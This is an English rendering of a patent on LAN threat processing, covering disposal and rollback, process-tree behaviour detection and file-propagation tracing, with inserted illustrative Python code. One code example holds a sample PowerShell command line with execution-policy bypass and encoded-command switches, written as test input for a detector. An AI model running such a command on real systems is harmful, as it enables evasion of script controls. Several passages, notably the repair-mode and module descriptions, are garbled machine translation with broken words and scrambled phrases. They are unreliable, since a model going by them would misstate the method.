Furthermore, to address the labor cost caused by erroneous disposal of threat objects, the embodiment of the present invention issues, for a target disposal operation that satisfies the preset rollback condition, a process rollback task to the corresponding user terminal, so that the user terminal rolls back the target disposal operation corresponding to the process rollback task. The object of the rollback is a disposal operation, so erroneous disposal can be resolved automatically while saving labor cost; that is, the efficiency of handling erroneous disposal is improved.
In addition, the embodiment of the present invention can, according to the process behavior reported by the user terminal, establish the process trees of the user terminal at different moments and the mapping relations between each process in the process tree and its process behavior, obtain from the process tree the target process that matches the preset process behavior pattern, and judge according to the process behavior of the target process whether the target process is a threat object. The preset behavior pattern can represent a suspicious behavior pattern or a malicious behavior pattern of process behavior. Because the embodiment obtains the target process by analyzing the process trees at different moments and the mapping relations between processes and process behavior, and judges from the behavior of that process whether it is a threat object, it can, relative to a traditional virus signature library, detect unknown threats and potential safety hazards in the LAN more promptly through the process trees at different moments, the process-to-behavior mapping relations and the preset behavior pattern that characterizes suspicious or malicious process behavior, improving the timeliness of security detection and enabling effective prevention of viruses.
With reference to Fig. 4, a step flow chart of a LAN-based threat processing method according to an embodiment of the present invention is shown, applied to a user terminal, which may include the following steps:
Step 401: receive a threat disposal task issued by the server;
Step 402: perform a disposal operation on the threat object corresponding to the threat disposal task;
Step 403: receive a process rollback task issued by the server for a target disposal operation that satisfies the preset rollback condition;
Step 404: roll back the target disposal operation corresponding to the process rollback task.
In practice, the user terminal can locate the corresponding threat object according to the threat disposal task issued by the server and perform the disposal operation on that threat object.
It should be noted that, in the embodiment of the present invention, each target disposal operation can have a corresponding rollback operation. If the target disposal operation is, for example, moving a threatening process into a quarantine area, the corresponding rollback restores that process from the quarantine area; if the target disposal operation is blocking a threatening URL, IP or DNS name by a firewall rule, the corresponding rollback removes that URL, IP or DNS name from the firewall rule. The embodiment of the present invention does not limit the specific target disposal operations and rollback operations.
In an optional embodiment of the present invention, before the step of rolling back the target disposal operation corresponding to the process rollback task, the method may further include: presenting to the user a rollback prompt for the target disposal operation corresponding to the process rollback task, and rolling back that target disposal operation according to the user's confirmation of the rollback prompt. The rollback prompt can ensure the accuracy of the rollback operation.
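As an added example (not the patent's or the assignees' code) of steps 402 and 404 together with the rollback prompt, the following user-terminal agent journals every disposal it applies along with what is needed to undo it, so that a process rollback task is executed as the exact inverse of the disposal it names. The task fields, the in-memory quarantine area and firewall rule set, and the confirmation callback are assumptions made for the illustration; a real agent would drive the operating system's process and firewall APIs in their place.

```python
from dataclasses import dataclass, field

@dataclass
class TerminalState:
    running: dict = field(default_factory=dict)      # pid -> image path of live processes
    quarantine: dict = field(default_factory=dict)   # pid -> image path of isolated processes
    firewall: set = field(default_factory=set)       # (kind, value) block rules, e.g. ("url", ...)
    journal: dict = field(default_factory=dict)      # disposal task id -> record needed for rollback

def dispose(state, task):
    """Step 402: apply one threat disposal task and journal it so it can be rolled back later."""
    if task["id"] in state.journal:
        return "duplicate"                 # a re-delivered task must not be applied twice
    if task["action"] == "quarantine_process":
        pid = task["pid"]
        if pid not in state.running:
            return "no_such_process"
        state.quarantine[pid] = state.running.pop(pid)
    elif task["action"] == "block":
        rule = (task["kind"], task["value"])   # kind is one of url / ip / dns
        if rule in state.firewall:
            return "already_blocked"
        state.firewall.add(rule)
    else:
        return "unsupported"
    state.journal[task["id"]] = dict(task)
    return "ok"

def rollback(state, rollback_task, confirm=lambda prompt: True):
    """Step 404: undo the disposal named by the rollback task; `confirm` models the user prompt."""
    rec = state.journal.get(rollback_task["disposal_id"])
    if rec is None:
        return "unknown_disposal"          # nothing journaled: refuse rather than guess
    if not confirm(f"Roll back {rec['action']} from task {rec['id']}?"):
        return "declined"
    if rec["action"] == "quarantine_process":
        state.running[rec["pid"]] = state.quarantine.pop(rec["pid"])
    elif rec["action"] == "block":
        state.firewall.discard((rec["kind"], rec["value"]))
    del state.journal[rec["id"]]           # a rollback can itself not be replayed
    return "ok"

if __name__ == "__main__":
    s = TerminalState(running={1234: r"C:\Users\u1\AppData\Local\Temp\x.exe"})
    print(dispose(s, {"id": "d1", "action": "quarantine_process", "pid": 1234}))
    print(dispose(s, {"id": "d2", "action": "block", "kind": "url", "value": "http://example.invalid/a.ps1"}))
    print(rollback(s, {"disposal_id": "d1"}, confirm=lambda p: input(p + " [y/N] ").lower() == "y"))
    print(s)
```

The journal is the point: a rollback task names a disposal, not an action, so the terminal never has to reconstruct what "undo" means from the server's description, and a rollback for a disposal that was never applied on this terminal (a stale or misrouted task) is rejected instead of, say, unblocking a rule that some other task created.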
In summary, in the LAN-based threat processing method of the embodiment of the present invention, the user terminal can roll back a target disposal operation that satisfies the preset rollback condition. The object of the rollback is a disposal operation, so erroneous disposal can be resolved automatically while saving labor cost; that is, the efficiency of handling erroneous disposal is improved.
With reference to Fig. 5, a step flow chart of a LAN-based threat processing method according to an embodiment of the present invention is shown, applied to a server, which may include the following steps:
Step 501: receive the process behavior reported by a user terminal in the LAN;
Step 502: according to the process behavior, establish the process trees of the user terminal at different moments and the mapping relations between each process in the process tree and its process behavior;
Step 503: obtain from the process tree a target process that matches the preset process behavior pattern;
Step 504: judge, according to the process behavior of the target process, whether the target process is a threat object;
Relative to the method embodiment shown in Fig. 2, the method of this embodiment may further include:
Step 505: if the target process is a threat object, obtain the abnormal file involved in the target process, and obtain from the previously collected file transmission events the file transmission events to be analyzed that correspond to the abnormal file, where the file transmission events are events reported by user terminals in the LAN;
Step 506: analyze the information of the file transmission events to be analyzed to obtain the transmission source and/or the affected user terminals corresponding to the abnormal file.
In the embodiment of the present invention, a second control instruction can be used to instruct the user terminal to report file transmission events to the server; after receiving the second control instruction, the user terminal can monitor local file transmission events and report the monitored file transmission events to the server.
In the embodiment of the present invention, a file transmission event represents a circulation event of a file on the user terminal side. Optionally, the information of a file transmission event can include at least one of: time information, channel information, file information, file transmission direction and terminal information. Time information represents the time at which the file transmission event occurred. Channel information represents the channel of the file transmission event and can, optionally, be the information of the application program or website corresponding to the event. File information identifies the file and may include, without limitation, the file name, file path and file signature; the file signature can be, for example, an MD5 (Message Digest Algorithm 5) hash, and it will be understood that the embodiment of the present invention does not limit the specific file signature (note that MD5 is collision-prone, so it serves here only as a matching key for events that already carry the same file, not as a tamper-proof identity; a SHA-256 hash fills the same role). File transmission direction can be inbound or outbound. Terminal information represents the information of the user terminal on which the file transmission event occurred.
In one application example of the present invention, the file transmission events can include at least one of: browser file transmission, IM (Instant Messaging) file transmission, e-mail attachment transmission, USB flash disk file transmission and download tool file transmission. Each file transmission event on the user terminal side is reported to the server, and what is reported can include the information of each file transmission event.
After receiving the file transmission events reported by each user terminal, the server can record the information of the received file transmission events. It should be noted that the embodiment of the present invention may record only file information such as the file name, file path or file signature of a file transmission event; because that file information is sufficient to trace the propagation path of the file, the embodiment can record the information of file transmission events without preserving the files themselves, saving storage space on the server.
After the information of the abnormal file has been obtained, step 505 can obtain from the previously collected file transmission events the file transmission events to be analyzed that correspond to the abnormal file. Specifically, the information of the abnormal file can be matched against the information of each file transmission event, and each event that matches is taken as a file transmission event to be analyzed; for example, the file signature of the abnormal file can be matched against the file signature of each file transmission event. It will be understood that the embodiment of the present invention does not limit the specific procedure for obtaining, from the previously collected file transmission events, the file transmission events to be analyzed that correspond to the abnormal file.
Step 506 can analyze the information of the file transmission events to be analyzed obtained in step 505, to obtain the transmission source and/or the affected user terminals corresponding to the abnormal file.
Because a file transmission event represents a circulation event of a file on the user terminal side, and every file transmission event on the user terminal side is reported to the server, the embodiment of the present invention can obtain the transmission source of the abnormal file by analyzing the information of the file transmission events to be analyzed that relate to the abnormal file. Accordingly, relative to a traditional virus signature library, the embodiment can detect unknown threats and potential safety hazards in the LAN more promptly through the file transmission events reported by user terminals, improving the timeliness of security detection; further, the transmission source of the abnormal file can be blocked as early as possible, closing the propagation path of the abnormal file.
In addition, through the file transmission events reported by user terminals, the embodiment of the present invention can detect more promptly the user terminals in the LAN affected by the abnormal file, so that repair of those affected terminals can be carried out as soon as possible; in this way the impact of the abnormal file on user terminals is stopped in time, and the users of those terminals are protected to a certain extent.
In an optional embodiment of the present invention, step 506 of analyzing the information of the file transmission events to be analyzed can include: according to the time information of the file transmission events to be analyzed, obtaining from them the target file transmission event with the earliest occurrence time, and obtaining the transmission source of the abnormal file according to the channel information of that target file transmission event. Because time information represents the occurrence time of a file transmission event, the event with the earliest occurrence time can be selected from the multiple file transmission events to be analyzed as the file transmission event corresponding to the propagation source, and the transmission source of the abnormal file can then be obtained from the channel information of that target file transmission event. This selection relies on the reported times being comparable across terminals and on the first transmission having been observed; if terminal clocks are skewed or the originating terminal was not yet reporting, the earliest recorded event may be a later hop rather than the true point of entry.
In one application example of the present invention, suppose the abnormal file is "purchase table.doc"; the target file transmission event with the earliest occurrence time can be obtained from the time information of the file transmission events to be analyzed that correspond to the abnormal file, that is, the first event in the LAN that relates to the abnormal file. For example, if the direction of the abnormal file is inbound and it entered the LAN through a channel such as a browser, a mailbox or a USB flash disk, the corresponding transmission source can be obtained from that channel information. Optionally, the transmission source can include, without limitation: a threatening URL, a threatening mailbox contact, a threatening IP, a threatening DNS name, or a threatening virus signature obtained by analysis.
In another optional embodiment of the present invention, the method of this embodiment may further include: blocking the transmission source corresponding to the abnormal file. Blocking the transmission source of the abnormal file closes the propagation path of the abnormal file.
Optionally, the step of blocking the transmission source corresponding to the abnormal file can include: setting a corresponding firewall rule for the transmission source of the abnormal file, so that the transmission source is blocked by the firewall rule. For example, a corresponding firewall rule can be set for a threatening URL, threatening mailbox contact, threatening IP or threatening DNS name, so as to block those transmission sources; for instance, mail sent by the threatening mailbox contact can be blocked.
It will be understood that blocking the transmission source by a firewall rule is only an optional embodiment; in practice, those skilled in the art are not limited to a specific blocking method. For a threatening virus signature, for example, blocking can also be performed through a virus signature library. It will be understood that any blocking method that blocks the transmission source falls within the protection scope of the embodiment of the present invention.
In an optional embodiment of the present invention, step 506 of analyzing the information of the file transmission events to be analyzed can include: obtaining the affected user terminals corresponding to the abnormal file according to the terminal information of the file transmission events to be analyzed. Because the file transmission events to be analyzed correspond to the abnormal file, the affected user terminals can be obtained from their terminal information. In one application example of the present invention, suppose the abnormal file is "purchase table.doc" and its first file transmission event in the LAN is an e-mail attachment transmission through a mailbox; user 1 of that first event then generates a second file transmission event by IM and transmits the abnormal file to user 2; user 2 then generates a third file transmission event through an e-mail attachment and transmits the abnormal file to user 3, and so on; user 1, user 2 and user 3 also trigger other file transmission events. If the number of file transmission events is N, N being a positive integer, the embodiment of the present invention can regard the terminals corresponding to those N file transmission events as affected terminals.
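The following is an added example (not code from the patent or its assignees) that runs steps 505 and 506 over a constructed set of reported file transmission events: events are matched to the abnormal file by signature, the earliest event's channel yields the transmission source, the terminal information of all matching events yields the affected terminals, the time-ordered hops give the propagation path that the server can reconstruct without ever having stored the file, and the source is turned into a blocking rule as in the firewall-rule embodiment above. The event record layout, channel field names, the rule schema and all sample values are assumptions made for the illustration; the sample reproduces the "purchase table.doc" scenario (mail in, IM to user 2, mail to user 3).

```python
import hashlib

# Constructed file signatures as a terminal would report them (MD5 used only as a matching key).
BAD_MD5 = hashlib.md5(b"constructed bytes standing in for purchase table.doc").hexdigest()
OTHER_MD5 = hashlib.md5(b"constructed bytes of an unrelated report.doc").hexdigest()

def _event(time, channel, name, md5, direction, terminal):
    # Only name, path and signature are recorded, never the file content.
    return {"time": time, "channel": channel,
            "file": {"name": name, "path": f"C:\\Users\\{terminal}\\{name}", "md5": md5},
            "direction": direction, "terminal": terminal}

# Constructed events reported by the terminals (steps 607/608); times are Unix seconds.
EVENTS = [
    _event(1483250100, {"type": "email", "sender": "attacker@example.invalid"}, "purchase table.doc", BAD_MD5, "in", "PC-U1"),
    _event(1483250400, {"type": "im", "app": "example-im"}, "purchase table.doc", BAD_MD5, "out", "PC-U1"),
    _event(1483250401, {"type": "im", "app": "example-im"}, "purchase table.doc", BAD_MD5, "in", "PC-U2"),
    _event(1483250900, {"type": "email", "sender": "u2@corp.example"}, "purchase table.doc", BAD_MD5, "out", "PC-U2"),
    _event(1483250905, {"type": "email", "sender": "u2@corp.example"}, "purchase table.doc", BAD_MD5, "in", "PC-U3"),
    _event(1483250000, {"type": "browser", "url": "http://example.invalid/report.doc"}, "report.doc", OTHER_MD5, "in", "PC-U9"),
]

def events_for_file(events, md5):
    """Step 505: match the abnormal file's signature against every recorded event."""
    return [e for e in events if e["file"]["md5"] == md5]

def transmission_source(to_analyze):
    """Step 506, source: the channel of the earliest event names where the file came from."""
    first = min(to_analyze, key=lambda e: e["time"])
    ch = first["channel"]
    kind, value = {"email": ("mail_contact", ch.get("sender")),
                   "browser": ("url", ch.get("url")),
                   "usb": ("usb_device", ch.get("device"))}.get(ch["type"], (ch["type"], None))
    return {"kind": kind, "value": value, "first_seen_on": first["terminal"]}

def affected_terminals(to_analyze):
    """Step 506, affected terminals: every terminal that reported an event for the file."""
    return sorted({e["terminal"] for e in to_analyze})

def propagation_path(to_analyze):
    """Hop list in time order; enough to trace the path although the file itself was not kept."""
    return [(e["terminal"], e["direction"], e["channel"]["type"])
            for e in sorted(to_analyze, key=lambda e: e["time"])]

FIREWALL_ACTIONS = {"url": "block_url", "ip": "block_ip", "dns": "block_dns", "mail_contact": "block_sender"}

def firewall_rule(source):
    """Blocking rule for the source (assumed schema); a USB device is not firewall-addressable."""
    if source["kind"] not in FIREWALL_ACTIONS or source["value"] is None:
        return None
    return {"action": FIREWALL_ACTIONS[source["kind"]], "match": source["value"]}

if __name__ == "__main__":
    ta = events_for_file(EVENTS, BAD_MD5)
    src = transmission_source(ta)
    print("source:", src)
    print("rule:", firewall_rule(src))
    print("affected:", affected_terminals(ta))
    print("path:", propagation_path(ta))
```

firewall_rule returns None for a USB source on purpose: the patent's early-warning step (a notification about the USB flash disk) is the applicable response there, and a blocking layer that silently ignored an unaddressable source would leave the operator believing the path was closed.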
In another kind of alternative embodiment of the present invention, the method for the present embodiment can also include:To the impacted use Family terminal carries out early warning process.For example, above-mentioned early warning is processed can send first to the user terminal for storing above-mentioned abnormal document Notification message, the USB flash disk to storing above-mentioned abnormal document sends second notification message etc., to realize for the closure of propagation path.
In another alternative embodiment of the present invention, the method for the present embodiment can also include:To the impacted use Family terminal carries out repair process.Alternatively, above-mentioned repair process can be with:The abnormal document for having transmitted is recalled, for example, can be right The abnormal document transmitted by Email attachment carries out recalling etc..
In another alternative embodiment of the present invention, carry out that repair process is corresponding to repair to the affected user terminal Compound formula, can include:
Repair mode 1, in single affected user terminal the corresponding process of abnormal document described in killing, if killing into Work(, the then corresponding process of abnormal document described in killing in all affected user terminals;Or
Repair mode 2, in single affected user terminal the corresponding process of abnormal document described in killing, if killing lose Lose, then carry out after data backup for each affected user terminal, update the operating system of each affected user terminal.
Wherein, repair mode 1 can attempt the abnormal document described in killing in single affected user terminal it is corresponding enter Journey, and judge whether the isolation that can realize the corresponding process of abnormal document according to killing result, if, then it is assumed that killing into Work(, therefore can the synchronously killing operation of the corresponding process of above-mentioned abnormal document in all affected user terminals.
Repair mode 2 then suitable for the situation of killing failure, specifically, can enter line number for each affected user terminal After backup, the operating system of each affected user terminal is updated;For example, the user data of affected user terminal can be copied Shellfish resets system to non-system disk or the mobile device of safety in affected user terminal.
It should be noted that during above-mentioned repair mode 1 and/or repair mode 2 is performed, can be by aforementioned step Rapid 101 to affected user terminal issues corresponding threat disposal task.Also, issuing accordingly to affected user terminal After threatening disposal task, if finding to threaten the corresponding disposal operations of disposal task to there is mistake, can there will be mistake Disposal operations issue process rollback times as the target disposal operations for meeting preset rollback condition to corresponding user terminal Business, so that the user terminal carries out rollback to the corresponding target disposal operations of the process rollback task.
To sum up, the threat processing method based on LAN of the embodiment of the present invention, because file transmission events can be used for table Show the circulation event of subscriber terminal side file, each file transmission events of subscriber terminal side are reported to server, therefore this Inventive embodiments can be based on the analysis of the information of pair to be analyzed file transmission events related to abnormal document, obtain abnormal literary The corresponding transmission source of part;Accordingly, with respect to traditional virus characteristic storehouse, the embodiment of the present invention can be reported by user terminal File transmission events, unknown threat and the potential safety hazard of LAN are detected more in time such that it is able to improve safety detection Promptness;Further, as early as possible intercept process can be carried out to the corresponding transmission source of the abnormal document, to realize for different The often closure of the propagation path of file.
In addition, the file transmission events that the embodiment of the present invention can be reported by user terminal, detect more in time out The affected user terminal affected by abnormal document in the net of domain, therefore can realize as soon as possible for the reparation of above-mentioned impacted terminal Process, so, can not only in time prevent abnormal document for the impact of user terminal, and can be effective to a certain extent The user of protection user terminal.
With reference to Fig. 6, a step flow chart of a LAN-based threat processing method according to an embodiment of the present invention is shown, which may include the following steps:
Step 601: the user terminal captures a local system snapshot after the operating system has finished starting, and reports the system snapshot to the server;
Step 602: the user terminal monitors the process behavior of local processes and reports the monitored process behavior to the server;
In practice, reporting of process behavior can be triggered when the process behavior of a local process changes; it will be understood that the embodiment of the present invention does not limit the specific trigger condition for reporting monitored process behavior to the server.
Step 603: the server, on the basis of the system snapshot, establishes the process trees of the user terminal at different moments according to the process behavior;
Step 604: the server establishes, for each process in the process tree, the mapping relation between the process and its process start/stop behavior and/or memory behavior and/or modification behavior;
Step 605: the server obtains from the process tree a target process that matches the preset process behavior pattern;
Step 606: the server judges, according to the process behavior of the target process, whether the target process is a threat object.
In an optional embodiment of the present invention, the method of this embodiment may further include:
Step 607: the user terminal monitors local file transmission events and reports the monitored file transmission events and their information to the server;
Step 608: the server records the file transmission events reported by the user terminal;
Step 609: if the target process is a threat object, the server obtains the abnormal file involved in the target process and obtains from the previously collected file transmission events the file transmission events to be analyzed that correspond to the abnormal file;
Step 610: the server analyzes the information of the file transmission events to be analyzed to obtain the transmission source and/or the affected user terminals corresponding to the abnormal file.
In summary, the LAN-based threat processing method of the embodiment of the present invention obtains the target process that matches the preset process behavior pattern by analyzing the process trees of the user terminal at different moments and the mapping relations between each process in the process tree and its process behavior, and judges according to the process behavior of the target process whether the target process is a threat object. Accordingly, relative to a traditional virus signature library, the embodiment can detect unknown threats and potential safety hazards in the LAN more promptly through the process trees at different moments, the process-to-behavior mapping relations and the preset behavior pattern that characterizes suspicious or malicious process behavior, improving the timeliness of security detection and enabling effective prevention of viruses.
Furthermore, because a file transmission event represents a circulation event of a file on the user terminal side and every file transmission event on the user terminal side is reported to the server, the embodiment of the present invention can obtain the transmission source of the abnormal file by analyzing the information of the file transmission events to be analyzed that relate to the abnormal file. Accordingly, relative to a traditional virus signature library, the embodiment can detect unknown threats and potential safety hazards in the LAN more promptly through the file transmission events reported by user terminals, improving the timeliness of security detection; further, the transmission source of the abnormal file can be blocked as early as possible, closing the propagation path of the abnormal file.
In addition, through the file transmission events reported by user terminals, the embodiment of the present invention can detect more promptly the user terminals in the LAN affected by the abnormal file, so that repair of those affected terminals can be carried out as soon as possible; in this way the impact of the abnormal file on user terminals is stopped in time, and the users of those terminals are protected to a certain extent.
For the method embodiments, for brevity of description, each is expressed as a series of combined actions; however, those skilled in the art should know that the embodiments of the present invention are not limited by the described order of actions, because according to the embodiments of the present invention some steps may be performed in other orders or simultaneously. Secondly, those skilled in the art should also know that the embodiments described in the specification are optional embodiments, and the actions involved are not necessarily required by the embodiments of the present invention.
With reference to Fig. 7, a kind of knot of threat processing meanss based on LAN according to an embodiment of the invention is shown Structure block diagram, is applied to server, specifically can include such as lower module:
First task issues module 701, for issuing threat disposal task to the user terminal in the LAN, so that The user terminal is disposed operation to the corresponding threat object of the threat disposal task;And
Second task issues module 702, for the target disposal operations for meeting preset rollback condition, to corresponding use Family terminal issues process rollback task, so that the user terminal enters to the corresponding target disposal operations of the process rollback task Row rollback.
Optionally, the device may further include:
A process behavior receiving module, configured to receive the process behaviors reported by the user terminals in the LAN;
An establishing module, configured to establish, according to the process behaviors, the process trees of the user terminal at different moments and the mapping relations between each process in a process tree and its process behaviors;
A target process acquisition module, configured to obtain from the process tree a target process that matches a preset process behavior pattern; and
A security detection module, configured to judge, according to the process behaviors of the target process, whether the target process is a threat object.
The process behavior receiving module, the establishing module, the target process acquisition module and the security detection module cooperate to detect threat objects in the LAN. Of course, those skilled in the art may detect threat objects in the LAN in other ways according to practical application requirements, for example by identifying threatening IP addresses from five-tuples; the embodiment of the present invention does not limit the specific way in which threat objects in the LAN are detected.
Optionally, the device may further include:
A snapshot receiving module, configured to receive a system snapshot at a certain moment reported by the user terminal;
and the establishing module may then include:
An establishing submodule, configured to establish, on the basis of the system snapshot and according to the above process behaviors, the process trees of the user terminal at different moments.
Optionally, the system snapshot may be the system state of the user terminal at a first moment, the process behaviors may include process start/stop behaviors, and the establishing submodule may then include:
A process tree establishing unit, configured to obtain the process tree of the user terminal at a second moment according to the process start/stop behaviors occurring after the first moment.
Optionally, the process behaviors may include process start/stop behaviors and/or memory behaviors and/or modification behaviors, and the establishing module may then include:
A mapping establishing submodule, configured to establish, for each process in the process tree, the mapping relation between the process and its process start/stop behaviors and/or memory behaviors and/or modification behaviors.
Optionally, the preset process behavior pattern may include:
a file-associated process starting a non-operating-system process; and/or
a process accessing and encrypting a second file after modifying a first file in the file system.
Optionally, the security detection module may include:
A first judging submodule, configured to send corresponding alarm information for the target process, so that an administrator, on the basis of the alarm information and the process behaviors of the target process, judges whether the target process is a threat object; and/or
A second judging submodule, configured to take the target process, or a descendant process of the target process, as the process to be analyzed, and to judge whether the target process is a threat object according to the execution parameters of the process behaviors of the process to be analyzed.
Optionally, the second judging submodule may include:
A first execution parameter detecting unit, configured to set the security detection result of the target process to unsafe when a command-line script environment parameter contained in the execution parameters relates to script encryption behavior; and/or
A second execution parameter detecting unit, configured to set the security detection result of the target process to unsafe when a policy exclusion parameter contained in the execution parameters relates to bypassing an execution restriction policy.
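The following is an added illustrative example and not part of the patent text: a server-side reconstruction of one terminal's process tree from a reported system snapshot plus the process start/stop, modification and encryption behaviors reported after it, a matcher for the two preset process behavior patterns described above, and the execution parameter checks of the second judging submodule applied to the target process and its descendants. The snapshot, the reported events and the sets of file-associated and operating-system process names are constructed for the example; the concrete parameter spellings the checks look for are the example's assumption, since the text names only a "command-line script environment parameter" related to script encryption and a "policy exclusion parameter" that bypasses an execution restriction policy.

```python
"""Added example (not code from the patent): process tree reconstruction,
preset behaviour pattern matching and execution parameter checks.
All snapshot/event data and the two name sets below are constructed."""
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Optional

FILE_ASSOCIATED = {"winword.exe", "excel.exe", "acrord32.exe"}            # file-type handlers (constructed)
OS_PROCESSES = {"explorer.exe", "svchost.exe", "conhost.exe", "csrss.exe"}  # OS binaries (constructed)


@dataclass
class Proc:
    pid: int
    name: str
    ppid: Optional[int]
    cmdline: str = ""
    alive: bool = True
    behaviours: List[dict] = field(default_factory=list)   # process -> behaviour mapping
    children: List[int] = field(default_factory=list)


class ProcessTree:
    """Process tree of one terminal; the snapshot is its state at the first moment."""

    def __init__(self, snapshot):
        self.procs: Dict[int, Proc] = {}
        for pid, name, ppid, cmdline in snapshot:
            self._start(pid, name, ppid, cmdline)

    def _start(self, pid, name, ppid, cmdline):
        self.procs[pid] = Proc(pid, name.lower(), ppid, cmdline)
        if ppid in self.procs:
            self.procs[ppid].children.append(pid)

    def apply(self, ev):
        """Advance the tree by one reported process behaviour."""
        if ev["type"] == "start":
            self._start(ev["pid"], ev["name"], ev["ppid"], ev.get("cmdline", ""))
        elif ev["type"] == "stop":
            if ev["pid"] in self.procs:
                self.procs[ev["pid"]].alive = False   # kept so its behaviour mapping survives
        elif ev["pid"] in self.procs:                 # memory / modification / encryption behaviours
            self.procs[ev["pid"]].behaviours.append(ev)

    def live_pids(self):
        """The process tree at the current (second) moment."""
        return {p.pid for p in self.procs.values() if p.alive}

    def descendants(self, pid):
        out, stack = [], list(self.procs[pid].children)
        while stack:
            c = stack.pop()
            out.append(c)
            stack.extend(self.procs[c].children)
        return out


def pattern_file_assoc_spawns_non_os(tree):
    """Pattern 1: a file-associated process starts a non-OS process."""
    return [p.pid for p in tree.procs.values() if p.name in FILE_ASSOCIATED
            and any(tree.procs[c].name not in OS_PROCESSES for c in p.children)]


def pattern_modify_then_encrypt(tree):
    """Pattern 2: after modifying a first file, the process accesses and encrypts a second one."""
    hits = []
    for p in tree.procs.values():
        first = None
        for b in p.behaviours:
            if b["type"] == "modify" and first is None:
                first = b["path"]
            elif b["type"] == "encrypt" and first is not None and b["path"] != first:
                hits.append(p.pid)
                break
    return hits


def check_execution_parameters(cmdline):
    """Reasons a command line is judged unsafe (empty list = no finding).
    The PowerShell-style spellings are this example's assumption for the text's
    'script environment parameter' and 'policy exclusion parameter'."""
    toks = [t.lower() for t in shlex.split(cmdline, posix=False)]
    reasons = []
    for i, t in enumerate(toks):
        p = t.lstrip("-/")
        if p and "encodedcommand".startswith(p):
            reasons.append("encoded (encrypted) script passed on the command line")
        if p and "executionpolicy".startswith(p) and i + 1 < len(toks) \
                and toks[i + 1] in ("bypass", "unrestricted"):
            reasons.append("execution restriction policy bypassed")
    return reasons


def judge(tree, target_pid):
    """Second judging submodule: the target and its descendants are the processes to be analysed."""
    findings = {pid: check_execution_parameters(tree.procs[pid].cmdline)
                for pid in [target_pid] + tree.descendants(target_pid)}
    findings = {k: v for k, v in findings.items() if v}
    return {"target": target_pid, "result": "unsafe" if findings else "no finding", "findings": findings}


def build_demo_tree():
    snapshot = [(4, "System", None, ""), (600, "explorer.exe", 4, "explorer.exe"),
                (1200, "WINWORD.EXE", 600, 'winword.exe "C:\\Users\\a\\invoice.docm"')]
    events = [  # reported after the snapshot, in order (constructed)
        {"type": "start", "pid": 1300, "name": "powershell.exe", "ppid": 1200,
         "cmdline": "powershell.exe -nop -ExecutionPolicy Bypass -EncodedCommand <BASE64_PLACEHOLDER>"},
        {"type": "start", "pid": 1310, "name": "conhost.exe", "ppid": 1300, "cmdline": "conhost.exe 0x4"},
        {"type": "modify", "pid": 1300, "path": "C:\\Users\\a\\Documents\\report.xlsx"},
        {"type": "encrypt", "pid": 1300, "path": "C:\\Users\\a\\Documents\\budget.xlsx"},
        {"type": "stop", "pid": 1310},
    ]
    tree = ProcessTree(snapshot)
    for ev in events:
        tree.apply(ev)
    return tree


if __name__ == "__main__":
    t = build_demo_tree()
    for pid in pattern_file_assoc_spawns_non_os(t) + pattern_modify_then_encrypt(t):
        print(judge(t, pid))
```

Stopped processes are kept in the tree with `alive=False` rather than deleted, because the mapping from a process to its behaviors is exactly what the judging step consults after the fact; `live_pids()` gives the process tree at the second moment as the text describes it. The parameter check deliberately matches prefixes, because script hosts commonly accept abbreviated switches, which a check on the full spelling alone would miss.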
Optionally, the device may further include:
A transmission event acquisition module, configured to obtain, when the security detection result of the target process is unsafe, the abnormal file involved in the target process and to obtain, from previously acquired file transmission events, the file transmission events to be analyzed that correspond to the abnormal file; where the file transmission events are events reported by the user terminals in the LAN;
A transmission event analysis module, configured to analyze the information of the file transmission events to be analyzed, so as to obtain the transmission source and/or the affected user terminals corresponding to the abnormal file.
Optionally, the transmission event analysis module may include:
A first transmission event analysis submodule, configured to obtain, according to the time information of the file transmission events to be analyzed, the target file transmission event with the earliest occurrence time from among them, and to obtain the transmission source of the abnormal file according to the channel information of that target file transmission event; and/or
A second transmission event analysis submodule, configured to obtain the affected user terminals corresponding to the abnormal file according to the terminal information of the file transmission events to be analyzed.
Optionally, the information of a file transmission event may include at least one of the following: time information, channel information, file information, file transfer direction and terminal information.
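An added illustrative example, not part of the patent text, of the transmission event acquisition module and the two transmission event analysis submodules above: the events are filtered to those concerning the abnormal file, the earliest event's channel information gives the transmission source, and the terminal information of the events gives the affected terminals. The file transmission events are constructed; their fields follow the five kinds of information listed above, plus a `peer` field (the other end of the transfer) that is the example's assumption. The `propagation_path` function goes beyond the text by ordering the inbound events into the hop-by-hop path the file took.

```python
"""Added example (not code from the patent): transmission event acquisition
and analysis over constructed file transmission events."""
from datetime import datetime

# Constructed events as reported by terminals; `file` is a content identifier
# (values constructed), `peer` is the other end of the transfer (assumption).
FILE_TRANSMISSION_EVENTS = [
    {"time": "2016-12-29T09:01:00", "channel": "usb",  "file": "sha256:c0ffee00",
     "direction": "in",  "terminal": "PC-017", "peer": "removable:E"},
    {"time": "2016-12-29T09:14:20", "channel": "smb",  "file": "sha256:c0ffee00",
     "direction": "out", "terminal": "PC-017", "peer": "PC-042"},
    {"time": "2016-12-29T09:14:21", "channel": "smb",  "file": "sha256:c0ffee00",
     "direction": "in",  "terminal": "PC-042", "peer": "PC-017"},
    {"time": "2016-12-29T10:02:05", "channel": "im",   "file": "sha256:c0ffee00",
     "direction": "in",  "terminal": "PC-103", "peer": "PC-042"},
    {"time": "2016-12-29T08:50:00", "channel": "http", "file": "sha256:beef0000",
     "direction": "in",  "terminal": "PC-002", "peer": "intranet-portal"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def acquire_events(events, abnormal_file):
    """Transmission event acquisition: the events to be analysed are those concerning the abnormal file."""
    return sorted((e for e in events if e["file"] == abnormal_file), key=_ts)


def transmission_source(to_analyze):
    """First submodule: the earliest event is the target event; its channel information gives the source."""
    if not to_analyze:
        return None
    first = min(to_analyze, key=_ts)
    return {"channel": first["channel"], "peer": first["peer"],
            "entry_terminal": first["terminal"], "time": first["time"]}


def affected_terminals(to_analyze):
    """Second submodule: the terminal information of the events names the affected terminals."""
    return sorted({e["terminal"] for e in to_analyze})


def propagation_path(to_analyze):
    """Beyond the text: inbound events in time order give the hop-by-hop path (peer -> terminal, channel)."""
    return [(e["peer"], e["terminal"], e["channel"]) for e in to_analyze if e["direction"] == "in"]


def analyze(events, abnormal_file):
    to_analyze = acquire_events(events, abnormal_file)
    return {"source": transmission_source(to_analyze),
            "affected": affected_terminals(to_analyze),
            "path": propagation_path(to_analyze)}


if __name__ == "__main__":
    print(analyze(FILE_TRANSMISSION_EVENTS, "sha256:c0ffee00"))
```

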